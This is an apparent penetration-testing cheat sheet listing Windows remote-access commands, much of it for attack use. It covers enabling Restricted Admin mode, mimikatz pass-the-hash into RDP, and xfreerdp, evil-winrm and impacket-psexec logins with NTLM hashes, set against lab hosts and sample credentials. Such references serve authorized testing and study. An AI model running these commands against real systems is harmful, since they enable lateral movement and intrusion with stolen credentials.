
Remote Access

Remote Desktop

If we only have the NTLM password hash, we can still use it for Remote Desktop, provided Restricted Admin mode is enabled on the target (set DisableRestrictedAdmin to 0 under the Lsa key):

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0

On Windows, this requires performing pass-the-hash with mimikatz first, which then launches mstsc in Restricted Admin mode under the injected credentials:

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:vulnableone /ntlm:9e7c6b33d9a2dfc1c9aef53eb2837b32 /run:"mstsc.exe /restrictedadmin"

xfreeRDP

# password logon with a fixed window size (password is prompted for)
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /cert-ignore
# pass-the-hash logon; only works when Restricted Admin mode is enabled on the target
xfreerdp /v:10.10.10.10 /u:administrator /cert-ignore /pth:4f9163ca3b673adfff2828f368ca3763
# domain logon with clipboard sharing enabled
xfreerdp /v:10.10.10.10 /u:administrator /w:1820 /h:768 /d:vulnableone.local +clipboard

mstsc on Windows

mstsc.exe /RestrictedAdmin /v:$hostname
mstsc.exe /v:$hostname

rdesktop

rdesktop 10.10.10.10 -u admin -p password -d vulnableone.local
rdesktop -g 95% -u khan.chanthou -p Password123 10.10.10.10 -x m -P -z

Winrs Access

C:\> winrs -r:pp-mgmt cmd

PSSession Remoting

PS C:\> $mgmt = New-PSSession pp-mgmt
PS C:\> Enter-PSSession $mgmt

PS C:\> Enter-PSSession -ComputerName FileServer -ConfigurationName j_sk12

PS C:\> $cred = Get-Credential
PS C:\> Enter-PSSession -ComputerName 10.10.10.10 -Authentication Negotiate -Credential $cred

ScriptBlock

Invoke-Command -ScriptBlock {hostname;whoami} -ComputerName pp-mgmt

Evil-WinRM

# password logon
evil-winrm -i $ip -u khan.chanthou -p Password123!
# pass-the-hash logon (-H takes the NTLM hash)
evil-winrm -i $ip -u khan.chanthou -H 89a3a7550ce8c505c2d46b5e39d6f802

Impacket

# PSExec
impacket-psexec vulnableone/khan.chanthou@10.10.10.10 -hashes :1b951bc4fdc5dfcd148161420b9c6207
impacket-psexec vulnableone/khan.chanthou@10.10.10.10
impacket-psexec vulnableone.local/administrator@10.10.10.10 -k -no-pass
PsExec.exe -accepteula \\pp-dc.vulnableone.local cmd

# MSSQL
impacket-mssqlclient -windows-auth vulnableone/sqlsvc@10.10.10.10
impacket-mssqlclient sql01.vulnableone.local -k
impacket-mssqlclient sa:SecureSecret@10.10.10.10

Last updated 1 year ago
